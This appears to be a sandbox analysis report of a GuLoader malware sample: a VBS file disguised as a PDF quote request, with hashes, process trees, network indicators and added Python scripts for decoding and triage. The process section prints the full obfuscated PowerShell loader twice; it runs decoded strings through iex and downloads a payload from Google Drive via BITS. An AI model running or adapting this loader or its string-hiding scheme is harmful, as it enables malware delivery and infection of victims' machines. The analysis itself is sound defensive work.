C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 17377c3f45ec353713f1d897171100af
SHA1 f30b5fd3577754f5ce25d28982fee6283fb9e0c1
SHA256 588353a715417a08f3eab42ee1a94afdeda0173661584c726e0347aaf82c5a73
SHA512 6ba88b1f1168df5674e0226555ca5c9d645412602d18450d747778156016e6fb7043a09fb38e12cb2d820d662ca9cf1a50c3409f39b16d57eb775ccc7dc1825c

C:\Users\Admin\AppData\Local\Temp\TarF46E.tmp

MD5 dd73cead4b93366cf3465c8cd32e2796
SHA1 74546226dfe9ceb8184651e920d1dbfb432b314e
SHA256 a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22
SHA512 ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

memory/3056-335-0x0000000000920000-0x000000000185D000-memory.dmp

memory/3056-340-0x0000000000400000-0x0000000000581000-memory.dmp

memory/3056-339-0x0000000000920000-0x000000000185D000-memory.dmp

memory/2752-342-0x0000000006810000-0x000000000774D000-memory.dmp

memory/3056-341-0x0000000000400000-0x0000000000581000-memory.dmp

memory/3056-343-0x0000000000400000-0x0000000000581000-memory.dmp

memory/3056-344-0x0000000000400000-0x0000000000581000-memory.dmp

memory/3056-345-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2308-347-0x000007FEF5B60000-0x000007FEF64FD000-memory.dmp

memory/3056-346-0x0000000000400000-0x0000000000581000-memory.dmp

memory/3056-349-0x0000000000400000-0x0000000000581000-memory.dmp

memory/3056-348-0x0000000000400000-0x0000000000581000-memory.dmp

memory/3056-350-0x0000000000400000-0x0000000000581000-memory.dmp

memory/3056-351-0x0000000000400000-0x0000000000581000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2248906074-2862704502-246302768-1000\0f5007522459c86e95ffcc62f32308f1_01c44f94-ed50-49f5-a690-d8e8ea9b0bf2

MD5 d898504a722bff1524134c6ab6a5eaa5
SHA1 e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA512 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2248906074-2862704502-246302768-1000\0f5007522459c86e95ffcc62f32308f1_01c44f94-ed50-49f5-a690-d8e8ea9b0bf2

MD5 c07225d4e7d01d31042965f048728a0a
SHA1 69d70b340fd9f44c89adb9a2278df84faa9906b7
SHA256 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA512 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

memory/3056-374-0x0000000000400000-0x0000000000581000-memory.dmp

memory/3056-375-0x0000000000400000-0x0000000000581000-memory.dmp

memory/3056-376-0x0000000000400000-0x0000000000581000-memory.dmp

memory/3056-377-0x0000000000400000-0x0000000000581000-memory.dmp

memory/3056-378-0x0000000000400000-0x0000000000581000-memory.dmp

memory/3056-379-0x0000000000400000-0x0000000000581000-memory.dmp

memory/3056-380-0x0000000000400000-0x0000000000581000-memory.dmp

memory/3056-382-0x0000000000400000-0x0000000000581000-memory.dmp

memory/3056-381-0x0000000000400000-0x0000000000581000-memory.dmp

memory/3056-383-0x0000000000400000-0x0000000000581000-memory.dmp

memory/3056-384-0x0000000000400000-0x0000000000581000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-25 16:26

Reported

2024-03-25 16:28

Platform

win10v2004-20240226-en

Max time kernel

140s

Max time network

144s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Solicitud de presupuesto Urgente 554PE·pdf.vbs"

Signatures

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WScript.exe | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A

Legitimate hosting services abused for malware hosting/C2

Description | Indicator | Process | Target
N/A | drive.google.com | N/A | N/A
N/A | drive.google.com | N/A | N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Solicitud de presupuesto Urgente 554PE·pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Superreflection Arrigere Benzamide #>;$Tephrite=(cmd /c set /A 115^^0);Function Underlivssygdom ([String]$Perkussion){$Tephrite=[char][int]$Tephrite;$Brndselsforbrug=$Tephrite+'ubstring';$Blodtud=8;$Befalinger=Politbureauer($Perkussion);For($Sentimentaliteternes=7; $Sentimentaliteternes -lt $Befalinger; $Sentimentaliteternes+=$Blodtud){$Greasewood=$Perkussion.$Brndselsforbrug.Invoke($Sentimentaliteternes, 1);$Homomorfiers=$Homomorfiers+$Greasewood;}$Homomorfiers;}function Bhmere ($Opkaldsforsgenes130){. ($Skelsaarene) ($Opkaldsforsgenes130);}function Politbureauer ([String]$Pussly47){$Efteruddannelseskurserne184=$Pussly47.Length-1;$Efteruddannelseskurserne184;}$Normalise=Underlivssygdom 'FinansmT RollehrmodkravaTruffesntimothysUndeniafgynaec,e BeredsrFloridirBearnaiiUnfuellnTill dsgKrystal ';$Rejfede=Underlivssygdom 'praksishHelstkntHaveejetBedri.gp .tofmnsInsigni:Obstetr/S ringm/Ho nhindS,peracrWampishiTilsig vFamil,aeAsper i.Moosewogbackupfo liequo surkaagUdpnseulNonsetteInsubo,.Epikurec olorcaoFremmedmDobbelt/ Omslynu ComputcTilsma,?Maelkave Faconnx R allnp MfindtoKaar,derImmunoet Und.rd=FlectacdDuggedeoBacteriwProtegenNongloblChokblgoJudgersaRelatiodDamasce&r possei Barnepd,amburu=T,eater1 AnstreiDipp,duGCradlemDUddriveSUnderhaBNlderruVLithotok,lluviavRebslagcFla deotUnhypnoVFinansugPentapoSFootpacJ fterneRSkraa iyPrinter1Substa.R SklmssMUnambitE mon,anoS ytsugJ Rest,aOReform TabbotnunUniversldelprob9Famili,jAnticatBLinjersZKr,byloSGirdledmKulture ';$Skelsaarene=Underlivssygdom 'Ska.leri.aundereNaturpaxProtect ';$Unfanatical=Underlivssygdom 'No amen$ ampshegDuennadlAfskalnoLuciferbAktivisa TinksmlLoesteg:ReintegNDefros.ymalignam Re.rgafTa kangoRgrunnem JordndaKbstadbnKaleturi ChromosJobnavn Man,fic=Ma,tnon Eftert,S T.gnestGravureaElektrirEvilsaytGlycoll-TrykordB esculeiSnnekontHeptagysHardf rTIntegrar.lodernaGooglyanledelinsCanzonifFinittee Tumphyr Accomp Drags.e-PlanereS 
,tarbaoKana,bouOver,eerSupe.obc.ogonsleS,ejfen Frazz e$,elandiRSprgeske Nu merj SatanifAntimaneAnang od Cro laeRhyp ro Greenla-Konsu.tDAcervateMasset sBellmaktBracerhiMerstignUdsmyknaUnpre it AreniciEpikur oStudentnG.eaveg unref e$overoffsHeale,scRansageaTher atnGr.vimetMisdeemlhjtrag iDeputatn .almstg illepo ';Bhmere (Underlivssygdom ' Semitr$R adighgRidd,rvlRabiditoBrandtobKarnosjaNonevinlC lubri: MisplasTraveskc SuperaaA ansihnGen emat BatraclbyggemyiPrevotinTutor.ygTortsve=vitamin$ OvernoeImpolitnRosalinvPannier:Ne.likea Re,venpGennemfpAlarm rd SurdejaMantisst Kyangoaguiding ') ;Bhmere (Underlivssygdom ' TepefyITrustmomovermilp xposuroIdrtsharUtak.emtArbejds-RocklesMBrancheoSk,bsfad Opdri,uMasselalMetasomeEightpe UndersB.erispoiExt nsit Flyv,bsVisersbTAfskrivrInbreeda RygskanSporulas Schismf TrilleeGrudgekrFor,uft ') ;$scantling=$scantling+'\Svanish.Udv' ;Bhmere (Underlivssygdom ' P.rson$S,squiogC,rvicolAblutioo ForvalbEksam.naSagita,lSlovaki:KronoloP onlubre Ko mennViriliztMandya aAntiguapKontroloplas,ifl,hemotaikyssenesLegalit=Int rmi( nequalT Ne,dfueBort.ljsForher,tDatasik-Malef cPMyectopaScr.wpotSulfatahVejrkor Poorisb$ AntonssSkippedcunnaturaSvi ebrnKlippebtunconsplResentmiDufte.enChinookg Boligm)Tiltr.a ') ;while (-not $Pentapolis) {Bhmere (Underlivssygdom 'DeprecaISubmorpfJesuate Brug,so( Homero$InstrukNUnchamfy FeriegmSekslbef SteppeoSmandskm TankefaVejrenenPentomiiMetodiks Stepne. B gageJMin.stro Maalesb SulfanS assebotMonoso aSkylightFuldvrdeNonconn ,ftrapp- OpkbteeDelesteqDistra. 
Brsern$GuaconiNAnpartsoChokr prNedarvnmAut,dafaAfg.vell,amrerdi Raskols OrglereDampssk) Signif .dveksl{GennemgS ForldrtfasanerarevolutrMetalsltcampho -Interl,S Hstgill bulkene arkfdeeVolke,wp Up,win Sammen1H rtigs}.orgonzeForsik.lBrudefrs ArresteRula.le{,ormogoSR harrotProfeteaCorbinarSwagg,rt ygroth-To.ristSMisinstlCoagulae Kramnie Nontrapri,erne Ne.atoc1Laryngo;LftelseBViklingh GenindmLobolooe TappedrJerikoreupbinds Saddel.$ ledormUSarrusonForsorgf Helbreasalsdren SmelteaChemisetu ugtsfiBanderncHexoctaaKomitmglOmkreds} Vindma ');Bhmere (Underlivssygdom 'Episcop$SaneredgUnblestlModarbeoAccept,bO.ergana besejllUnseawo:Fer,oelPGennemtecivilisnHappenetInabusia,rofferp kkkeneofilamenlUnfro kiResizess Shonki=.tatska(RepentsTBalledreMennesksRecarrytSchoold- PassioPUnlituraSjungedtModstykhJok.ste D ninge$JavitersTils,recConviciaSkibsben Brug rtAnmeldelAldrichiRe,argunHypovalgHoldnum)f,rbrug ') ;}Bhmere (Underlivssygdom 'Hje,fal$ReglemegJugu.arlElokvenoSoranskbhusnummaPangm.rl,ildige:Mu.ticoC DuraunePhonemir Empaesa Over.utGappieroRep rtedMale,isiSslaglodOutba,kaWendisheAsylmot Limpetl=Inaniti SkotteGPu,vieweV.nkorttPolygal-A tivitCRetrofooQuiverenAlurgittLigedaneRobingknhearabltunionis Kammera$ PastursFormatlcKo,torda UnstoinPotteritSem.cyllFlyversiNr.edspn Informg Raunpi ');Bhmere (Underlivssygdom 'C echos$Enam.llgTranssklZucch to MelomabFlyvegra Prsid lKuglefl:Sluse.rVShtokavaSydd,nsn Ve eftdNi,eaulbTudesquaAnk mmedEtchimieChuckawtviriliosOvermal Ifints=Wlatso. 
Foruddi[ Her,taSkostskoyste hors uccestRepelleeTo vognm Virkso.SuppletCBrickexoFloddelnFlaskebvVejledeeSurnamer UnbrigtKonditi]Vi,osis:Apophys:Or,hardFSug.pumr Emigr,oprerelamTank.ngB etstrma IndvirsDomsakteDokumet6Helgens4 ladbrdSLuxembotLevellerFe.tnavi P pkornSkyllemgU,fitte(Godkend$Be,aevnCdarrelteRootagerPaleontaDancesst Solituo.eorchedSpleetni.ossepldNamarekaInterpeeInconc )Assecur ');Bhmere (Underlivssygdom ' pjatte$ UndvrlgSk altalK,rkegaotestsysb St tevaDisental Tilbeh: SelvovTKonditooBugt.lshudslusna.soximeaStatsopnOrtopd.dAvisarts Hjrnets,eastlivTelefonrDin,hyddD,migraeKvatoritIntersesYodelle Konnota=Folkeb. Ba itao[Du,gtesSStedepuyAspektesSwiplestRallysfeLnregulmAbrimrd. UrocenTSe ianaeIr,nmakxOmslag t ,rynte.BorderlE ChemotnComminacIodizero ChannedPortrttiAntiv vn ThreepgCent rf]Svbelse: Colubr:KeekingAFoto opS StedmoC PniterIKandidaIVigands. observGRationeeComprizt FlyproS ,ightat B,andlrV rdensiPo,ychrnIwanse.g hurchm(Perienc$AntipewVBefo.knaHostelrnT rpitsd Agete,b bios.eaUnoxid d ObdureeHoolieutSu.ersasZoo icp)Pho,oio ');Bhmere (Underlivssygdom 'lapning$bdeforlgpresupplPropolioNgendanbBairnlya DagsorlReaktio:Synlig,U arkerinVotariemTrykninoToughenvYdervgsaPhiloneb For.kalciliciae Sne lonBrandeieCoi.sjasud.igspsCorol.i=Sp ogly$ FagblaT Dieselo EksporhDdebogsa SrgebiaLuteinin RetoucdVaffelssSysselms Pas.opv aer.bar Infighd Skibspeo.ersoctAnvendesCredibl.S udievsTi vognuMarilinbGennemssUrostiftTr.dverrMisk.ediYellowsnnon.sycg Me,cer(dem.nic3Indefin1ledemot2 Waried8A tiamu7Consist9Unde we, etorto3Coul.ge2Sub erg1 Tetrag5Offerer5handrai)Frstere ');Bhmere $Unmovableness;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Superreflection Arrigere Benzamide #>;$Tephrite=(cmd /c set /A 115^^0);Function Underlivssygdom ([String]$Perkussion){$Tephrite=[char][int]$Tephrite;$Brndselsforbrug=$Tephrite+'ubstring';$Blodtud=8;$Befalinger=Politbureauer($Perkussion);For($Sentimentaliteternes=7; $Sentimentaliteternes -lt $Befalinger; $Sentimentaliteternes+=$Blodtud){$Greasewood=$Perkussion.$Brndselsforbrug.Invoke($Sentimentaliteternes, 1);$Homomorfiers=$Homomorfiers+$Greasewood;}$Homomorfiers;}function Bhmere ($Opkaldsforsgenes130){. ($Skelsaarene) ($Opkaldsforsgenes130);}function Politbureauer ([String]$Pussly47){$Efteruddannelseskurserne184=$Pussly47.Length-1;$Efteruddannelseskurserne184;}$Normalise=Underlivssygdom 'FinansmT RollehrmodkravaTruffesntimothysUndeniafgynaec,e BeredsrFloridirBearnaiiUnfuellnTill dsgKrystal ';$Rejfede=Underlivssygdom 'praksishHelstkntHaveejetBedri.gp .tofmnsInsigni:Obstetr/S ringm/Ho nhindS,peracrWampishiTilsig vFamil,aeAsper i.Moosewogbackupfo liequo surkaagUdpnseulNonsetteInsubo,.Epikurec olorcaoFremmedmDobbelt/ Omslynu ComputcTilsma,?Maelkave Faconnx R allnp MfindtoKaar,derImmunoet Und.rd=FlectacdDuggedeoBacteriwProtegenNongloblChokblgoJudgersaRelatiodDamasce&r possei Barnepd,amburu=T,eater1 AnstreiDipp,duGCradlemDUddriveSUnderhaBNlderruVLithotok,lluviavRebslagcFla deotUnhypnoVFinansugPentapoSFootpacJ fterneRSkraa iyPrinter1Substa.R SklmssMUnambitE mon,anoS ytsugJ Rest,aOReform TabbotnunUniversldelprob9Famili,jAnticatBLinjersZKr,byloSGirdledmKulture ';$Skelsaarene=Underlivssygdom 'Ska.leri.aundereNaturpaxProtect ';$Unfanatical=Underlivssygdom 'No amen$ ampshegDuennadlAfskalnoLuciferbAktivisa TinksmlLoesteg:ReintegNDefros.ymalignam Re.rgafTa kangoRgrunnem JordndaKbstadbnKaleturi ChromosJobnavn Man,fic=Ma,tnon Eftert,S T.gnestGravureaElektrirEvilsaytGlycoll-TrykordB esculeiSnnekontHeptagysHardf rTIntegrar.lodernaGooglyanledelinsCanzonifFinittee Tumphyr Accomp Drags.e-PlanereS 
,tarbaoKana,bouOver,eerSupe.obc.ogonsleS,ejfen Frazz e$,elandiRSprgeske Nu merj SatanifAntimaneAnang od Cro laeRhyp ro Greenla-Konsu.tDAcervateMasset sBellmaktBracerhiMerstignUdsmyknaUnpre it AreniciEpikur oStudentnG.eaveg unref e$overoffsHeale,scRansageaTher atnGr.vimetMisdeemlhjtrag iDeputatn .almstg illepo ';Bhmere (Underlivssygdom ' Semitr$R adighgRidd,rvlRabiditoBrandtobKarnosjaNonevinlC lubri: MisplasTraveskc SuperaaA ansihnGen emat BatraclbyggemyiPrevotinTutor.ygTortsve=vitamin$ OvernoeImpolitnRosalinvPannier:Ne.likea Re,venpGennemfpAlarm rd SurdejaMantisst Kyangoaguiding ') ;Bhmere (Underlivssygdom ' TepefyITrustmomovermilp xposuroIdrtsharUtak.emtArbejds-RocklesMBrancheoSk,bsfad Opdri,uMasselalMetasomeEightpe UndersB.erispoiExt nsit Flyv,bsVisersbTAfskrivrInbreeda RygskanSporulas Schismf TrilleeGrudgekrFor,uft ') ;$scantling=$scantling+'\Svanish.Udv' ;Bhmere (Underlivssygdom ' P.rson$S,squiogC,rvicolAblutioo ForvalbEksam.naSagita,lSlovaki:KronoloP onlubre Ko mennViriliztMandya aAntiguapKontroloplas,ifl,hemotaikyssenesLegalit=Int rmi( nequalT Ne,dfueBort.ljsForher,tDatasik-Malef cPMyectopaScr.wpotSulfatahVejrkor Poorisb$ AntonssSkippedcunnaturaSvi ebrnKlippebtunconsplResentmiDufte.enChinookg Boligm)Tiltr.a ') ;while (-not $Pentapolis) {Bhmere (Underlivssygdom 'DeprecaISubmorpfJesuate Brug,so( Homero$InstrukNUnchamfy FeriegmSekslbef SteppeoSmandskm TankefaVejrenenPentomiiMetodiks Stepne. B gageJMin.stro Maalesb SulfanS assebotMonoso aSkylightFuldvrdeNonconn ,ftrapp- OpkbteeDelesteqDistra. 
Brsern$GuaconiNAnpartsoChokr prNedarvnmAut,dafaAfg.vell,amrerdi Raskols OrglereDampssk) Signif .dveksl{GennemgS ForldrtfasanerarevolutrMetalsltcampho -Interl,S Hstgill bulkene arkfdeeVolke,wp Up,win Sammen1H rtigs}.orgonzeForsik.lBrudefrs ArresteRula.le{,ormogoSR harrotProfeteaCorbinarSwagg,rt ygroth-To.ristSMisinstlCoagulae Kramnie Nontrapri,erne Ne.atoc1Laryngo;LftelseBViklingh GenindmLobolooe TappedrJerikoreupbinds Saddel.$ ledormUSarrusonForsorgf Helbreasalsdren SmelteaChemisetu ugtsfiBanderncHexoctaaKomitmglOmkreds} Vindma ');Bhmere (Underlivssygdom 'Episcop$SaneredgUnblestlModarbeoAccept,bO.ergana besejllUnseawo:Fer,oelPGennemtecivilisnHappenetInabusia,rofferp kkkeneofilamenlUnfro kiResizess Shonki=.tatska(RepentsTBalledreMennesksRecarrytSchoold- PassioPUnlituraSjungedtModstykhJok.ste D ninge$JavitersTils,recConviciaSkibsben Brug rtAnmeldelAldrichiRe,argunHypovalgHoldnum)f,rbrug ') ;}Bhmere (Underlivssygdom 'Hje,fal$ReglemegJugu.arlElokvenoSoranskbhusnummaPangm.rl,ildige:Mu.ticoC DuraunePhonemir Empaesa Over.utGappieroRep rtedMale,isiSslaglodOutba,kaWendisheAsylmot Limpetl=Inaniti SkotteGPu,vieweV.nkorttPolygal-A tivitCRetrofooQuiverenAlurgittLigedaneRobingknhearabltunionis Kammera$ PastursFormatlcKo,torda UnstoinPotteritSem.cyllFlyversiNr.edspn Informg Raunpi ');Bhmere (Underlivssygdom 'C echos$Enam.llgTranssklZucch to MelomabFlyvegra Prsid lKuglefl:Sluse.rVShtokavaSydd,nsn Ve eftdNi,eaulbTudesquaAnk mmedEtchimieChuckawtviriliosOvermal Ifints=Wlatso. 
Foruddi[ Her,taSkostskoyste hors uccestRepelleeTo vognm Virkso.SuppletCBrickexoFloddelnFlaskebvVejledeeSurnamer UnbrigtKonditi]Vi,osis:Apophys:Or,hardFSug.pumr Emigr,oprerelamTank.ngB etstrma IndvirsDomsakteDokumet6Helgens4 ladbrdSLuxembotLevellerFe.tnavi P pkornSkyllemgU,fitte(Godkend$Be,aevnCdarrelteRootagerPaleontaDancesst Solituo.eorchedSpleetni.ossepldNamarekaInterpeeInconc )Assecur ');Bhmere (Underlivssygdom ' pjatte$ UndvrlgSk altalK,rkegaotestsysb St tevaDisental Tilbeh: SelvovTKonditooBugt.lshudslusna.soximeaStatsopnOrtopd.dAvisarts Hjrnets,eastlivTelefonrDin,hyddD,migraeKvatoritIntersesYodelle Konnota=Folkeb. Ba itao[Du,gtesSStedepuyAspektesSwiplestRallysfeLnregulmAbrimrd. UrocenTSe ianaeIr,nmakxOmslag t ,rynte.BorderlE ChemotnComminacIodizero ChannedPortrttiAntiv vn ThreepgCent rf]Svbelse: Colubr:KeekingAFoto opS StedmoC PniterIKandidaIVigands. observGRationeeComprizt FlyproS ,ightat B,andlrV rdensiPo,ychrnIwanse.g hurchm(Perienc$AntipewVBefo.knaHostelrnT rpitsd Agete,b bios.eaUnoxid d ObdureeHoolieutSu.ersasZoo icp)Pho,oio ');Bhmere (Underlivssygdom 'lapning$bdeforlgpresupplPropolioNgendanbBairnlya DagsorlReaktio:Synlig,U arkerinVotariemTrykninoToughenvYdervgsaPhiloneb For.kalciliciae Sne lonBrandeieCoi.sjasud.igspsCorol.i=Sp ogly$ FagblaT Dieselo EksporhDdebogsa SrgebiaLuteinin RetoucdVaffelssSysselms Pas.opv aer.bar Infighd Skibspeo.ersoctAnvendesCredibl.S udievsTi vognuMarilinbGennemssUrostiftTr.dverrMisk.ediYellowsnnon.sycg Me,cer(dem.nic3Indefin1ledemot2 Waried8A tiamu7Consist9Unde we, etorto3Coul.ge2Sub erg1 Tetrag5Offerer5handrai)Frstere ');Bhmere $Unmovableness;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 3140 -ip 3140

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3140 -s 2520
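
The two powershell.exe command lines above carry the same GuLoader script, launched once by the 64-bit host and again by the 32-bit one under syswow64. Every string the script uses is hidden the same way: cmd /c set /A 115^^0 returns 115 (the doubled caret is a cmd.exe escape, so set /A evaluates 115 XOR 0), [char]115 is 's', and 's' + 'ubstring' is the method name that Underlivssygdom invokes on each junk-padded literal, keeping index 7, 15, 23, ... and stopping once the index reaches Length-1, so the last pad character is never read. The Python below is an added example written for this page, not code from the report or the sample; it re-implements that extraction and checks it against two literals copied from the command line: $Skelsaarene decodes to iex, which is what Bhmere dot-sources every decoded string through, and $Normalise decodes to Transferring, the BITS JobState that the while (-not $Pentapolis) loop polls while Start-BitsTransfer fetches the drive.google.com URL held in $Rejfede into $scantling ($env:appdata plus the literal '\Svanish.Udv' visible on the page). The longer literals on this page do not all decode cleanly because the rendering collapsed runs of whitespace inside them, which shifts the eight-character stride; decode from the raw command line the sandbox captured, not from this copy.

```python
"""Added example (not part of the sandbox report): decoder for the string
hiding used by the GuLoader PowerShell stage recorded above.

Every literal handed to `Underlivssygdom` is a junk-padded string from which
the stage reads index 7, 15, 23, ... (one real character per eight), stopping
as soon as the index reaches Length-1, so the final pad character is dropped.
The method name `substring` is assembled at runtime from the result of
`cmd /c set /A 115^^0` (115 XOR 0 = 115 = 's') plus the literal 'ubstring'.
"""
import re

START, STEP = 7, 8      # $Sentimentaliteternes=7; ... += $Blodtud (8)


def method_name(cmd_result: int = 115) -> str:
    """$Tephrite = [char][int](cmd /c set /A 115^^0); the doubled caret is a
    cmd.exe escape, so set /A evaluates 115^0, i.e. 115 XOR 0, which is 's'."""
    return chr(cmd_result ^ 0) + "ubstring"


def deobfuscate(padded: str) -> str:
    """Re-implements Underlivssygdom + Politbureauer: take the characters at
    START, START+STEP, ... while the index is strictly less than len-1."""
    limit = len(padded) - 1             # Politbureauer returns Length-1
    return "".join(padded[i] for i in range(START, limit, STEP))


# In this sample the junk padding contains no single quote, so a plain
# quote-to-quote match isolates each literal.
LITERAL = re.compile(r"Underlivssygdom '([^']*)'")


def decode_literals(fragment: str) -> list:
    """Decode every `Underlivssygdom '...'` literal in a script fragment, in order."""
    return [deobfuscate(m) for m in LITERAL.findall(fragment)]


# Two literals copied verbatim from the command line above. Each decodes to a
# single PowerShell token, so neither was damaged by the whitespace collapsing
# that has corrupted some of the longer strings on this page.
NORMALISE = ("FinansmT RollehrmodkravaTruffesntimothysUndeniafgynaec,e "
             "BeredsrFloridirBearnaiiUnfuellnTill dsgKrystal ")
SKELSAARENE = "Ska.leri.aundereNaturpaxProtect "

# Constructed fragment in the shape of the two assignments on the page.
FRAGMENT = (f"$Normalise=Underlivssygdom '{NORMALISE}';"
            f"$Skelsaarene=Underlivssygdom '{SKELSAARENE}';")

if __name__ == "__main__":
    print(method_name())                                   # substring
    for name, value in zip(("$Normalise", "$Skelsaarene"),
                           decode_literals(FRAGMENT)):
        print(f"{name} -> {value!r}")                      # 'Transferring', 'iex'
```

Run against the sandbox's raw command line, decode_literals returns the real script in execution order; the URL and the BITS job, rather than the padded noise, are what belong in the indicator list.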

Network

Country Destination Domain Proto
US 8.8.8.8:53 202.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
US 20.231.121.79:80 tcp
GB 172.217.169.78:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.179.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 78.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 225.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 186.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
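
Most of the Network table above is sandbox background: reverse lookups of every address the VM touched, the resolver at 8.8.8.8, and the Bing hosts that Windows contacts on its own. What is left is the Google Drive download that the decoded BITS transfer explains (drive.google.com, then the redirect target drive.usercontent.google.com) and one bare TCP connection to 20.231.121.79:80 for which the report records no domain. The script below is an added example written for this page, not tooling from the sandbox; it parses the table in the flattened form shown here, drops the background rows, and returns the domains and ip:port endpoints that still need a decision. The rows embedded in it are a subset copied from the table.

```python
"""Added example (not from the sandbox report): reduce the flattened Network
table above to the rows worth reviewing. Rows below are copied from the
table; the one without a domain is the bare TCP connection to 20.231.121.79:80
exactly as the report shows it.
"""
import re
from collections import OrderedDict

NETWORK_TABLE = """\
Country Destination Domain Proto
US 8.8.8.8:53 202.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 drive.google.com udp
US 20.231.121.79:80 tcp
GB 172.217.169.78:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.179.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
"""

RESOLVER = "8.8.8.8"                      # the sandbox's DNS forwarder, not attacker infrastructure
BACKGROUND = (".bing.com", ".bing.net")   # search/telemetry hosts Windows contacts on its own

# Country, ip:port, optional domain, proto. The domain group is optional so the
# 20.231.121.79:80 row, which has no domain, still parses.
ROW = re.compile(
    r"^(?P<cc>[A-Z]{2}) (?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+)"
    r"(?: (?P<domain>\S+))? (?P<proto>tcp|udp)$")


def parse_rows(table: str) -> list:
    """Parse 'CC ip:port [domain] proto' lines; header and blank lines are skipped."""
    rows = []
    for line in table.splitlines():
        m = ROW.match(line.strip())
        if m:
            rows.append(m.groupdict())
    return rows


def is_background(domain: str) -> bool:
    """Reverse lookups the sandbox performs on addresses it saw, and Bing traffic."""
    return domain.endswith(".in-addr.arpa") or domain.endswith(BACKGROUND)


def triage(table: str):
    """Return (domains, endpoints) left after filtering, deduplicated, first-seen order.
    Queried domains are kept even though the query went to the resolver; the
    resolver itself is never reported as an endpoint."""
    domains, endpoints = OrderedDict(), OrderedDict()
    for r in parse_rows(table):
        domain = r["domain"] or ""
        if is_background(domain):
            continue
        if domain:
            domains[domain] = None
        if r["ip"] != RESOLVER:
            endpoints[f"{r['ip']}:{r['port']}"] = None
    return list(domains), list(endpoints)


if __name__ == "__main__":
    doms, eps = triage(NETWORK_TABLE)
    print("domains :", doms)    # drive.google.com, drive.usercontent.google.com
    print("endpoints:", eps)    # 20.231.121.79:80 plus the two Google front ends
```

The Google addresses that survive are shared front ends and are poor block-list entries; the durable indicator is the drive.usercontent.google.com download, identified by the file id inside the decoded $Rejfede URL. The 20.231.121.79:80 connection is reported with no domain, so the table alone cannot say whether it belongs to the sample or to the VM; it stays in the output precisely so that it gets looked at rather than silently dropped.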

Files

